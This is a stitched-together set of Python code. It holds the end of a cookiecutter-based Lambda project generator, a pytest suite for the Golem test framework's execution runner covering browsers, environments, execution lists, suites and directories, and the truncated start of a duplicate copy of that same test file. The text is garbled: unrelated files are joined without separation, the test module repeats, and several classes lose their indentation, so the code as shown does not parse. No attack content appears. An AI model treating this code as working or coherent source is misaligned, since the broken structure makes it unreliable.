            if not dependency_manager or dependency_manager == mapping["dependency_manager"]:
                template = mapping["init_location"]
                break
    if not template:
        msg = "Lambda Runtime {} does not support dependency manager: {}".format(runtime, dependency_manager)
        raise GenerateProjectFailedError(project=name, provider_error=msg)

    # A user-supplied template location always wins over the built-in one.
    params = {"template": location if location else template, "output_dir": output_dir, "no_input": no_input}
    LOG.debug("Parameters dict created with input given")
    LOG.debug("%s", params)

    if not location and name is not None:
        # Built-in templates are baked non-interactively with the project
        # name and runtime passed as cookiecutter extra context.
        params["extra_context"] = {"project_name": name, "runtime": runtime}
        params["no_input"] = True
        LOG.debug("Parameters dict updated with project name as extra_context")
        LOG.debug("%s", params)

    try:
        LOG.debug("Baking a new template with cookiecutter with all parameters")
        cookiecutter(**params)
    except CookiecutterException as e:
        # Chain the original cookiecutter failure for easier debugging.
        # Fix: stray dataset residue ("| 0.580471 | 0.128143") removed from
        # this line; also explicit exception chaining and removal of the
        # unnecessary list() wrappers above.
        raise GenerateProjectFailedError(project=name, provider_error=e) from e
import json
import os
from types import SimpleNamespace
import pytest
from golem.execution_runner import execution_runner as exc_runner
from golem.core import test
from golem.core import test_data
from golem.core import environment_manager
from golem.core import utils
from golem.core import settings_manager
from golem.core import file_manager
from golem.core import session
from golem.report import execution_report as exec_report
class TestDefineBrowsers:
    """Tests for execution_runner.define_browsers."""

    remote_browsers = {
        'chrome_60_mac': {
            'browserName': 'chrome',
            'version': '60.0',
            'platform': 'macOS 10.12'
        }
    }

    default_browsers = ['chrome', 'chrome-headless']

    def test_define_browsers(self):
        """A mix of a predefined and a remote browser is resolved correctly."""
        selected = ['chrome', 'chrome_60_mac']
        local_chrome = {
            'name': 'chrome',
            'full_name': None,
            'remote': False,
            'capabilities': {}
        }
        remote_chrome = {
            'name': 'chrome',
            'full_name': 'chrome_60_mac',
            'remote': True,
            'capabilities': {
                'browserName': 'chrome',
                'version': '60.0',
                'platform': 'macOS 10.12'
            }
        }
        result = exc_runner.define_browsers(selected, self.remote_browsers,
                                            self.default_browsers)
        assert result == [local_chrome, remote_chrome]

    def test_define_browsers_drivers_empty(self):
        """An empty browser selection yields an empty result."""
        result = exc_runner.define_browsers([], self.remote_browsers,
                                            self.default_browsers)
        assert result == []

    def test_define_browsers_driver_is_not_defined(self):
        """An unknown browser name raises with a message listing the options."""
        expected_msg = (
            'Error: the browser {} is not defined\n'.format('not_defined')
            + 'available options are:\n'
            + '\n'.join(self.default_browsers)
            + '\n'.join(list(self.remote_browsers.keys()))
        )
        with pytest.raises(Exception) as excinfo:
            _ = exc_runner.define_browsers(['not_defined'], self.remote_browsers,
                                           self.default_browsers)
        assert str(excinfo.value) == expected_msg

    def test_define_browsers_browser_order_of_preference(self):
        """Remote browsers take precedence over predefined browsers when a
        name exists in both collections."""
        remote = {
            'chromex': {
                'browserName': 'chrome',
                'version': '60.0',
                'platform': 'macOS 10.12'
            }
        }
        defined = exc_runner.define_browsers(['chromex'], remote, ['chromex'])
        assert len(defined) == 1
        assert defined[0]['remote'] is True
        assert defined[0]['capabilities']['version'] == '60.0'
class TestSelectEnvironments:
    """Tests for ExecutionRunner._select_environments.

    Precedence shown by these tests: CLI envs > suite envs > first
    project environment > empty list.
    """

    @pytest.mark.slow
    def test__select_environments(self, project_session):
        """Verify that _select_environments uses the correct order
        of precedence"""
        _, project = project_session.activate()
        cli_envs = ['cli_env_1', 'cli_env_2']
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.project = project
        execution_runner.cli_args.envs = cli_envs
        execution_runner.suite.envs = ['suite_env_1', 'suite_env_2']
        project_envs = environment_manager.get_envs(project)
        result_envs = execution_runner._select_environments(project_envs)
        # CLI-provided environments win over suite environments.
        assert result_envs == cli_envs

    @pytest.mark.slow
    def test__select_environments_cli_envs_empty(self, project_function):
        """Verify that _select_environments uses the correct order
        of precedence when cli environments is empty"""
        testdir, project = project_function.activate()
        cli_envs = []
        suite_envs = ['suite_env_1', 'suite_env_2']
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.project = project
        execution_runner.cli_args.envs = cli_envs
        execution_runner.suite.envs = suite_envs
        # NOTE(review): this writes <testdir>/environments.json while the test
        # below writes <testdir>/projects/<project>/environments.json — suite
        # envs win regardless, so the file location is not exercised here;
        # confirm which path environment_manager actually reads.
        path = os.path.join(testdir, 'environments.json')
        with open(path, 'w+') as f:
            f.write('{"env1": {}, "env2": {}}')
        project_envs = environment_manager.get_envs(project)
        result_envs = execution_runner._select_environments(project_envs)
        assert result_envs == suite_envs

    @pytest.mark.slow
    def test__select_environments_cli_envs_empty_suite_envs_empty(self, project_function):
        """Verify that _select_environments uses the correct order
        of precedence when cli environments and suite environments are empty"""
        testdir, project = project_function.activate()
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.project = project
        execution_runner.cli_args.envs = []
        execution_runner.suite.envs = []
        path = os.path.join(testdir, 'projects', project, 'environments.json')
        with open(path, 'w+') as f:
            f.write('{"env3": {}, "env4": {}}')
        project_envs = environment_manager.get_envs(project)
        result_envs = execution_runner._select_environments(project_envs)
        # Falls back to the first project environment only.
        assert result_envs == ['env3']

    @pytest.mark.slow
    def test__select_environments_all_envs_empty(self, project_function):
        """Verify that _select_environments uses the correct order
        of precedence when cli environments, suite environments and
        project environments are empty"""
        _, project = project_function.activate()
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.project = project
        execution_runner.cli_args.envs = []
        # Fix: this line previously assigned cli_args.envs twice; the sibling
        # tests show the second assignment must clear suite.envs instead.
        execution_runner.suite.envs = []
        project_envs = environment_manager.get_envs(project)
        result_envs = execution_runner._select_environments(project_envs)
        assert result_envs == []
class TestDefineExecutionList:
    """Tests for ExecutionRunner._define_execution_list.

    The expected lists below show that the execution list is the product of
    tests x data sets x browsers x environments, with project secrets
    attached to every entry.
    """
    @pytest.mark.slow
    def test_define_execution_list(self, project_function_clean):
        """Verify that the execution list is generated properly when there's only
        one test without datasets, one driver and zero environments
        """
        project_function_clean.activate()
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = ['test_001']
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = []
        execution_runner.project = project_function_clean.name
        execution_list = execution_runner._define_execution_list()
        # A single test with no data sets yields exactly one entry.
        expected_list = [
            SimpleNamespace(name='test_001', data_set={}, secrets={}, browser='chrome',
                            reportdir=None, env=None)
        ]
        assert execution_list == expected_list
    @pytest.mark.slow
    def test_define_execution_list_multiple_data_sets(self, project_function_clean):
        """Verify that the execution list is generated properly when a test
        has multiple data sets
        """
        _, project = project_function_clean.activate()
        test_name = 'test_002'
        test.create_test(project, test_name)
        tdata = [
            {
                'col1': 'a',
                'col2': 'b'
            },
            {
                'col1': 'c',
                'col2': 'd',
            }
        ]
        test_data.save_external_test_data_file(project, test_name, tdata)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = []
        execution_runner.project = project_function_clean.name
        execution_list = execution_runner._define_execution_list()
        # One entry per data set.
        expected_list = [
            SimpleNamespace(name=test_name, data_set={'col1': 'a', 'col2': 'b'}, secrets={},
                            browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name=test_name, data_set={'col1': 'c', 'col2': 'd'}, secrets={},
                            browser='chrome', reportdir=None, env=None)
        ]
        assert execution_list == expected_list
    @pytest.mark.slow
    def test_define_execution_list_multiple_tests(self, project_function_clean):
        """Verify that the execution list is generated properly when there
        are multiple tests in the list
        """
        _, project = project_function_clean.activate()
        # create test one
        test_name_one = 'test_one_001'
        test.create_test(project, test_name_one)
        tdata = [
            {
                'col1': 'a',
                'col2': 'b'
            },
            {
                'col1': 'c',
                'col2': 'd',
            }
        ]
        test_data.save_external_test_data_file(project, test_name_one, tdata)
        # create test two
        test_name_two = 'test_two_001'
        test.create_test(project, test_name_two)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name_one, test_name_two]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = []
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        # Test one expands into its two data sets; test two has none.
        expected_list = [
            SimpleNamespace(name='test_one_001', data_set={'col1': 'a', 'col2': 'b'}, secrets={},
                            browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name='test_one_001', data_set={'col1': 'c', 'col2': 'd'}, secrets={},
                            browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name='test_two_001', data_set={}, secrets={},
                            browser='chrome', reportdir=None, env=None)
        ]
        assert execution_list == expected_list
    @pytest.mark.slow
    def test_define_execution_list_multiple_envs(self, project_function_clean):
        """Verify that the execution list is generated properly when the execution
        has multiple envs
        """
        _, project = project_function_clean.activate()
        # create test one
        test_name_one = 'test_one_003'
        test.create_test(project, test_name_one)
        # create two environments in environments.json
        env_data = {
            "stage": {"url": "xxx"},
            "preview": {"url": "yyy"}
        }
        env_data_json = json.dumps(env_data)
        environment_manager.save_environments(project, env_data_json)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name_one]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = ['stage', 'preview']
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        # The environment dict (with its name injected) lands in data_set['env'].
        expected_list = [
            SimpleNamespace(name='test_one_003', data_set={'env': {'url': 'xxx', 'name': 'stage'}}, secrets={},
                            browser='chrome', reportdir=None, env='stage'),
            SimpleNamespace(name='test_one_003', data_set={'env': {'url': 'yyy', 'name': 'preview'}}, secrets={},
                            browser='chrome', reportdir=None, env='preview')
        ]
        assert execution_list == expected_list
    @pytest.mark.slow
    def test_define_execution_list_multiple_drivers(self, project_function_clean):
        """Verify that the execution list is generated properly when there
        are multiple drivers in the list
        """
        _, project = project_function_clean.activate()
        # create test one
        test_name_one = 'test_one_004'
        test.create_test(project, test_name_one)
        # create test two
        test_name_two = 'test_two_004'
        test.create_test(project, test_name_two)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name_one, test_name_two]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome', 'firefox']
        execution_runner.execution.envs = []
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        # Each test runs once per browser.
        expected_list = [
            SimpleNamespace(name='test_one_004', data_set={}, secrets={}, browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name='test_one_004', data_set={}, secrets={}, browser='firefox', reportdir=None, env=None),
            SimpleNamespace(name='test_two_004', data_set={}, secrets={}, browser='chrome', reportdir=None, env=None),
            SimpleNamespace(name='test_two_004', data_set={}, secrets={}, browser='firefox', reportdir=None, env=None)
        ]
        assert execution_list == expected_list
    @pytest.mark.slow
    def test_define_execution_list_multiple_tests_datasets_drivers_envs(
            self, project_function_clean):
        """Verify that the execution list is generated properly when there
        are multiple tests, data sets, drivers and environments
        """
        _, project = project_function_clean.activate()
        # create test one
        test_name_one = 'test_one_005'
        test.create_test(project, test_name_one)
        # test data for test one
        tdata = [
            {'col1': 'a' },
            {'col1': 'b'}
        ]
        test_data.save_external_test_data_file(project, test_name_one, tdata)
        # create test two
        test_name_two = 'test_two_005'
        test.create_test(project, test_name_two)
        # create two environments
        env_data = {
            "stage": {"url": "xxx"},
            "preview": {"url": "yyy"}
        }
        env_data_json = json.dumps(env_data)
        environment_manager.save_environments(project, env_data_json)
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = [test_name_one, test_name_two]
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome', 'firefox']
        execution_runner.execution.envs = ['stage', 'preview']
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        # Full product: 2 data sets x 2 envs x 2 browsers for test one (8),
        # plus 2 envs x 2 browsers for test two (4).
        expected_list = [
            SimpleNamespace(browser='chrome', data_set={'col1': 'a', 'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_one_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='firefox', data_set={'col1': 'a', 'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_one_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='chrome', data_set={'col1': 'a', 'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_one_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='firefox', data_set={'col1': 'a', 'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_one_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='chrome', data_set={'col1': 'b', 'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_one_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='firefox', data_set={'col1': 'b', 'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_one_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='chrome', data_set={'col1': 'b', 'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_one_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='firefox', data_set={'col1': 'b', 'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_one_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='chrome', data_set={'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_two_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='firefox', data_set={'env': {'url': 'xxx', 'name': 'stage'}},
                            secrets={}, name='test_two_005', reportdir=None, env='stage'),
            SimpleNamespace(browser='chrome', data_set={'env': {'url': 'yyy', 'name': 'preview'}},
                            secrets={}, name='test_two_005', reportdir=None, env='preview'),
            SimpleNamespace(browser='firefox', data_set={'env': {'url': 'yyy','name': 'preview'}},
                            secrets={}, name='test_two_005', reportdir=None, env='preview')
        ]
        assert execution_list == expected_list
    @pytest.mark.slow
    def test_define_execution_list_with_secrets(self, project_function_clean):
        """Verify that secrets read from the project's secrets.json are
        attached to every execution entry.
        """
        _, project = project_function_clean.activate()
        secrets = {"a": "secret", "b": "secret02"}
        secrets_path = os.path.join(project_function_clean.path, 'secrets.json')
        with open(secrets_path, 'w') as secrets_file:
            secrets_file.write(json.dumps(secrets, indent=True))
        execution_runner = exc_runner.ExecutionRunner()
        execution_runner.tests = ['test_001']
        execution_runner.execution.processes = 1
        execution_runner.execution.browsers = ['chrome']
        execution_runner.execution.envs = []
        execution_runner.project = project
        execution_list = execution_runner._define_execution_list()
        expected_list = [
            SimpleNamespace(name='test_001', data_set={}, secrets={"a": "secret", "b": "secret02"}, browser='chrome', reportdir=None, env=None)
        ]
        assert execution_list == expected_list
class TestCreateExecutionDirectory:
@pytest.mark.slow
def test__create_execution_directory_is_suite(self, project_class):
"""Verify that create_execution_directory works as expected when
a suite is passed on
"""
_, project = project_class.activate()
timestamp = utils.get_timestamp()
suite_name = 'bar'
execution_runner = exc_runner.ExecutionRunner()
execution_runner.tests = ['test_foo']
execution_runner.project = project
execution_runner.is_suite = True
execution_runner.suite_name = suite_name
execution_runner.timestamp = timestamp
execution_runner._create_execution_directory()
expected_path = os.path.join(project_class.path, 'reports', suite_name, timestamp)
assert os.path.isdir(expected_path)
@pytest.mark.slow
def test__create_execution_directory_is_not_suite(self, project_class):
"""Verify that create_execution_directory works as expected when
a not suite is passed on
"""
_, project = project_class.activate()
test_name = 'foo'
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner()
execution_runner.test_name = test_name
execution_runner.project = project
execution_runner.is_suite = False
execution_runner.timestamp = timestamp
execution_runner._create_execution_directory()
expected_path = os.path.join(project_class.path, 'reports', 'single_tests', test_name, timestamp)
assert os.path.isdir(expected_path)
class TestRunSingleTest:
    """Tests that run a single test via ExecutionRunner.run_test and inspect
    the report directory written under reports/single_tests/<test>/<timestamp>.
    """
    @pytest.mark.slow
    def test_run_single_test(self, project_class, test_utils):
        testdir, project = project_class.activate()
        test_name = 'foo001'
        timestamp = utils.get_timestamp()
        session.settings = settings_manager.get_project_settings(project)
        test_utils.create_test(project, test_name)
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_test(test_name)
        test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
                                       'single_tests', test_name, timestamp)
        assert os.path.isdir(test_report_dir)
        items = os.listdir(test_report_dir)
        # test set dir + report.json
        assert len(items) == 2
    @pytest.mark.slow
    def test_run_single_test_with_two_sets(self, project_class, test_utils, capsys):
        """Run a single test with two data sets.
        It should display the number of tests and test sets found."""
        testdir, project = project_class.activate()
        test_name = 'foo002'
        timestamp = utils.get_timestamp()
        session.settings = settings_manager.get_project_settings(project)
        content = ('data = [{"foo": 1}, {"foo": 2}]\n'
                   'def test(data):\n'
                   ' pass\n')
        test_utils.create_test(project, test_name, content=content)
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_test(test_name)
        out, err = capsys.readouterr()
        # number of tests is displayed
        assert 'Tests found: 1 (2 sets)' in out
        test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
                                       'single_tests', test_name, timestamp)
        assert os.path.isdir(test_report_dir)
        items = os.listdir(test_report_dir)
        # two test set dirs + report.json
        assert len(items) == 3
    @pytest.mark.slow
    def test_run_single_test_filter_by_tags(self, project_class, test_utils):
        """Run a single test with filtering by tags"""
        testdir, project = project_class.activate()
        test_name = 'foo003'
        timestamp = utils.get_timestamp()
        session.settings = settings_manager.get_project_settings(project)
        content = ('tags = ["alfa", "bravo"]\n'
                   'def test(data):\n'
                   ' pass\n')
        test_utils.create_test(project, test_name, content=content)
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp,
                                                      tags=['alfa'])
        execution_runner.project = project
        execution_runner.run_test(test_name)
        test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
                                       'single_tests', test_name, timestamp)
        assert os.path.isdir(test_report_dir)
        items = os.listdir(test_report_dir)
        # test set dir + report.json
        assert len(items) == 2
    @pytest.mark.slow
    def test_run_single_test_with_invalid_tags(self, project_class, test_utils, capsys):
        # NOTE(review): unlike the sibling tests, this one does not set
        # session.settings before running — confirm whether that is needed
        # or whether the other tests can drop it too.
        testdir, project = project_class.activate()
        test_name = 'foo004'
        timestamp = utils.get_timestamp()
        content = ('tags = ["alfa", "bravo"]\n'
                   'def test(data):\n'
                   ' pass\n')
        test_utils.create_test(project, test_name, content=content)
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp,
                                                      tags=['charlie'])
        execution_runner.project = project
        execution_runner.run_test(test_name)
        out, err = capsys.readouterr()
        assert 'No tests found with tag(s): charlie' in out
        test_report_dir = os.path.join(testdir, 'projects', project, 'reports',
                                       'single_tests', test_name, timestamp)
        assert os.path.isdir(test_report_dir)
        items = os.listdir(test_report_dir)
        # only report.json is present
        assert items == ['report.json']
class TestRunSuite:
@pytest.fixture(scope="class")
def _project_with_tags(self, project_class, test_utils):
"""A fixture of a project with tests that contain tags"""
_, project = project_class.activate()
tests = SimpleNamespace()
base_content = 'def test(data):\n pass\n'
tests.test_alfa_bravo = 'test_alfa_bravo'
content = 'tags = ["alfa", "bravo"]'
test_utils.create_test(project, tests.test_alfa_bravo, content=base_content+content)
tests.test_bravo_charlie = 'test_bravo_charlie'
content = 'tags = ["bravo", "charlie"]'
test_utils.create_test(project, tests.test_bravo_charlie, content=base_content+content)
tests.test_empty_tags = 'test_empty_tags'
content = 'tags = []'
test_utils.create_test(project, tests.test_empty_tags, content=base_content+content)
tests.test_no_tags = 'test_no_tags'
content = 'def test(data):\n pass'
test_utils.create_test(project, tests.test_no_tags, content=base_content+content)
project_class.tests = list(tests.__dict__)
project_class.t = tests
return project_class
@pytest.mark.slow
def test_run_suite(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'Tests found: 2' in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 2
def test_run_suite_without_tests(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
test_utils.create_suite(project, suite_name, tests=[])
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'No tests found for suite {}'.format(suite_name) in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 0
@pytest.mark.slow
def test_run_suite_filter_by_tags(self, _project_with_tags, test_utils, capsys):
_, project = _project_with_tags.activate()
suite_name = test_utils.random_numeric_string(10, 'suite')
tests = [_project_with_tags.t.test_alfa_bravo,
_project_with_tags.t.test_bravo_charlie]
test_utils.create_suite(project, suite_name, tests=tests)
timestamp = utils.get_timestamp()
execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
timestamp=timestamp,
tags=['alfa', 'bravo'])
execution_runner.project = project
execution_runner.run_suite(suite_name)
out, err = capsys.readouterr()
assert 'Tests found: 1' in out
data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
assert data['has_finished'] is True
assert data['total_tests'] == 1
@pytest.mark.slow
def test_run_suite_filter_by_invalid_tags(self, _project_with_tags, test_utils, capsys):
    """Filtering by tags that no test carries runs nothing but still
    produces a finished report with zero tests.
    """
    _, project = _project_with_tags.activate()
    suite_name = test_utils.random_numeric_string(10, 'suite')
    suite_tests = [
        _project_with_tags.t.test_alfa_bravo,
        _project_with_tags.t.test_bravo_charlie,
    ]
    test_utils.create_suite(project, suite_name, tests=suite_tests)
    ts = utils.get_timestamp()
    runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=ts,
                                        tags=['sierra', 'tango'])
    runner.project = project
    runner.run_suite(suite_name)
    captured = capsys.readouterr()
    assert 'No tests found with tag(s): sierra, tango' in captured.out
    report = exec_report.get_execution_data(project=project, suite=suite_name,
                                            execution=ts)
    assert report['has_finished'] is True
    assert report['total_tests'] == 0
def test_run_suite_filter_by_invalid_tag_expression(self, _project_with_tags,
                                                    test_utils, capsys):
    """When an invalid tag expression is used a message is displayed
    to the console, no tests are run, the report is generated,
    and the execution exits with status code 1
    """
    _, project = _project_with_tags.activate()
    suite_name = test_utils.random_numeric_string(10, 'suite')
    tests = [_project_with_tags.t.test_alfa_bravo,
             _project_with_tags.t.test_bravo_charlie]
    test_utils.create_suite(project, suite_name, tests=tests)
    timestamp = utils.get_timestamp()
    # '=' (assignment) is not a valid operator inside a tag expression
    execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                                  timestamp=timestamp,
                                                  tags=['sierra = tango'])
    execution_runner.project = project
    with pytest.raises(SystemExit):
        execution_runner.run_suite(suite_name)
    out, err = capsys.readouterr()
    # The repr of the offending AST node differs across Python versions:
    # older versions report the private '_ast' module, 3.9+ reports 'ast'
    expected = ("InvalidTagExpression: unknown expression <class '_ast.Assign'>, the "
                "only valid operators for tag expressions are: 'and', 'or' & 'not'")
    # TODO: py 3.9
    expected2 = ("InvalidTagExpression: unknown expression <class 'ast.Assign'>, the "
                 "only valid operators for tag expressions are: 'and', 'or' & 'not'")
    assert expected in out or expected2 in out
    data = exec_report.get_execution_data(project=project, suite=suite_name, execution=timestamp)
    assert data['has_finished'] is True
    assert data['total_tests'] == 0
class TestRunDirectory:
    """Tests for ExecutionRunner.run_directory."""

    @pytest.fixture(scope="class")
    def _project_with_tags(self, project_class, test_utils):
        """A fixture of a project with tests that contain tags

        Creates two tagged tests inside the 'foo' directory, two tests
        without usable tags at the project root, and an empty
        'tests/empty' directory for the "no tests found" scenario.
        """
        testdir, project = project_class.activate()
        tests = SimpleNamespace()
        base_content = 'def test(data):\n pass\n'
        tests.test_alfa_bravo = 'test_alfa_bravo'
        content = 'tags = ["alfa", "bravo"]'
        test_name = '{}.{}'.format('foo', tests.test_alfa_bravo)
        test_utils.create_test(project, test_name, content=base_content + content)
        tests.test_bravo_charlie = 'test_bravo_charlie'
        content = 'tags = ["bravo", "charlie"]'
        test_name = '{}.{}'.format('foo', tests.test_bravo_charlie)
        test_utils.create_test(project, test_name, content=base_content + content)
        tests.test_empty_tags = 'test_empty_tags'
        content = 'tags = []'
        test_utils.create_test(project, tests.test_empty_tags, content=base_content + content)
        tests.test_no_tags = 'test_no_tags'
        content = 'def test(data):\n pass'
        test_utils.create_test(project, tests.test_no_tags, content=base_content + content)
        # directory with no tests inside, exercised by the "without tests" test
        path_list = [testdir, 'projects', project, 'tests', 'empty']
        file_manager.create_directory(path_list=path_list, add_init=True)
        # expose the created test names to the test methods
        project_class.tests = list(tests.__dict__)
        project_class.t = tests
        return project_class

    @pytest.mark.slow
    def test_run_directory(self, _project_with_tags, capsys):
        # only the two tests inside the 'foo' directory should be collected
        _, project = _project_with_tags.activate()
        timestamp = utils.get_timestamp()
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_directory('foo')
        out, err = capsys.readouterr()
        assert 'Tests found: 2' in out
        data = exec_report.get_execution_data(project=project, suite='foo', execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 2

    def test_run_directory_without_tests(self, _project_with_tags, capsys):
        # an empty directory still yields a finished report with zero tests
        _, project = _project_with_tags.activate()
        timestamp = utils.get_timestamp()
        dirname = 'empty'
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'], timestamp=timestamp)
        execution_runner.project = project
        execution_runner.run_directory(dirname)
        out, err = capsys.readouterr()
        expected = 'No tests were found in {}'.format(os.path.join('tests', dirname))
        assert expected in out
        data = exec_report.get_execution_data(project=project, suite=dirname, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 0

    @pytest.mark.slow
    def test_run_directory_filter_by_tags(self, _project_with_tags, test_utils, capsys):
        # only test_alfa_bravo carries both 'alfa' and 'bravo'
        _, project = _project_with_tags.activate()
        timestamp = utils.get_timestamp()
        dirname = 'foo'
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                                      timestamp=timestamp,
                                                      tags=['alfa', 'bravo'])
        execution_runner.project = project
        execution_runner.run_directory(dirname)
        out, err = capsys.readouterr()
        assert 'Tests found: 1' in out
        data = exec_report.get_execution_data(project=project, suite=dirname, execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 1
class TestRunWithEnvs:
    """Tests for running executions against one or more environments.

    Fix: the last line of this class had non-Python dataset residue
    ('| tests/execution_runner/execution_runner_test.py | import json')
    fused onto the final assert, which made the file unparseable.
    """

    @pytest.mark.slow
    def test_run_with_environments(self, project_function, test_utils, capsys):
        """One test run against two environments produces two test sets."""
        _, project = project_function.activate()
        environments = json.dumps({'test': {}, 'stage': {}})
        environment_manager.save_environments(project, environments)
        test_utils.create_test(project, 'test01')
        timestamp = utils.get_timestamp()
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                                      timestamp=timestamp,
                                                      environments=['test', 'stage'])
        execution_runner.project = project
        execution_runner.run_directory('')
        out, err = capsys.readouterr()
        assert 'Tests found: 1 (2 sets)' in out
        data = exec_report.get_execution_data(project=project, suite='all', execution=timestamp)
        assert data['has_finished'] is True
        # one test x two environments -> two executed test sets
        assert data['total_tests'] == 2

    def test_run_with_not_existing_environments(self, project_function, test_utils, capsys):
        """Run tests with a not existing environment.
        It should throw an error and finish with status code 1
        """
        _, project = project_function.activate()
        test_utils.create_test(project, 'test01')
        timestamp = utils.get_timestamp()
        execution_runner = exc_runner.ExecutionRunner(browsers=['chrome'],
                                                      timestamp=timestamp,
                                                      environments=['not_existing'])
        execution_runner.project = project
        with pytest.raises(SystemExit) as wrapped_execution:
            execution_runner.run_directory('')
        assert wrapped_execution.value.code == 1
        out, err = capsys.readouterr()
        msg = ('ERROR: the following environments do not exist for project {}: '
               'not_existing'.format(project))
        assert msg in out
        data = exec_report.get_execution_data(project=project, suite='all', execution=timestamp)
        assert data['has_finished'] is True
        assert data['total_tests'] == 0
import json
import os
from types import SimpleNamespace

import pytest

from golem.execution_runner import execution_runner as exc_runner
from golem.core import test
from golem.core import test_data
from golem.core import environment_manager
from golem.core import utils
from golem.core import settings_manager
from golem.core import file_manager
from golem.core import session
from golem.report import execution_report as exec_report
class TestDefineBrowsers:
    """Tests for exc_runner.define_browsers."""

    remote_browsers = {
        'chrome_60_mac': {
            'browserName': 'chrome',
            'version': '60.0',
            'platform': 'macOS 10.12'
        }
    }

    default_browsers = ['chrome', 'chrome-headless']

    def test_define_browsers(self):
        """Verify that _define_browsers returns the correct values"""
        selected = ['chrome', 'chrome_60_mac']
        result = exc_runner.define_browsers(selected, self.remote_browsers,
                                            self.default_browsers)
        # a predefined local browser and a remote one, in selection order
        assert result == [
            {
                'name': 'chrome',
                'full_name': None,
                'remote': False,
                'capabilities': {}
            },
            {
                'name': 'chrome',
                'full_name': 'chrome_60_mac',
                'remote': True,
                'capabilities': {
                    'browserName': 'chrome',
                    'version': '60.0',
                    'platform': 'macOS 10.12'
                }
            }
        ]

    def test_define_browsers_drivers_empty(self):
        """Verify that _define_browsers returns correct value
        when selected drivers is empty
        """
